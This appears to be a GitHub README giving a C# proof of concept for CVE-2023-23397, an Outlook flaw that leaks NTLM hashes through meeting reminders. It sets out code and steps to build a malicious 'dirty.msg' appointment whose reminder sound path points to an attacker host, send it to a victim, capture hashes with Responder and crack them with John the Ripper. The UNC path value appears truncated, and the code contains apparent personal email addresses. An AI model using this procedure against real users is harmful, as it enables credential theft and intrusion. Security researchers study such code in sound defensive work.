
CVE-2023-23397 C# PoC

Primary LanguageC#


CVE-2023-23397 C# PoC 1- download the msgkit 2- edit the appointment class and add the below: image

3- create a new class inside the project to set the proprieties of the msg file:

using MsgKit.Enums;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace MsgKit
    class Program
        static void Main(string[] args)
            using (var appointment = new Appointment(
            new Sender("moneertv@gmail.com", "moneertv"),
            new Representing("moneertv@gmail.com", "moneertv"),
                appointment.Recipients.AddTo("moneer-1998@hotmail.com", "muneer aqraa");
                appointment.Subject = "CVE-2023-23397";
                appointment.Location = "Neverland";
                appointment.MeetingStart = DateTime.Now.Date.AddDays(2).Date;
                appointment.MeetingEnd = DateTime.Now.Date.AddDays(3).Date;
                appointment.AllDay = true;
                appointment.BodyText = "CVE-2023-23397";
                appointment.BodyHtml = "<html><head></head><body><b>testing CVE-2023-23397</b></body></html>";
                appointment.SentOn = DateTime.UtcNow;
                appointment.Importance = MessageImportance.IMPORTANCE_NORMAL;
                appointment.IconIndex = MessageIconIndex.UnsentMail;

                appointment.PidLidReminderFileParameter = @"\\\";
                appointment.PidLidReminderOverride = true;

                appointment.Save(@"C:\Users\Moneer\Desktop\exploits\CVE-2023-23397\MsgKit-master\generated email msg\dirty.msg");



4- change the properties for the project output type to console: image

5- run the project to generate the dirty.msg

6- send the message to a vulnerable target, and wait tell the reminder of the meeting activate.

6-2- while waiting, on the kali machine which we have put its IP on the main class, run the below command to keep listening for any one who got the bait: # responder -I eth0 -v

7- once you got the hashes, store them in a file, and run the john ripper on the hashes against a wordlist (ex: rockyou)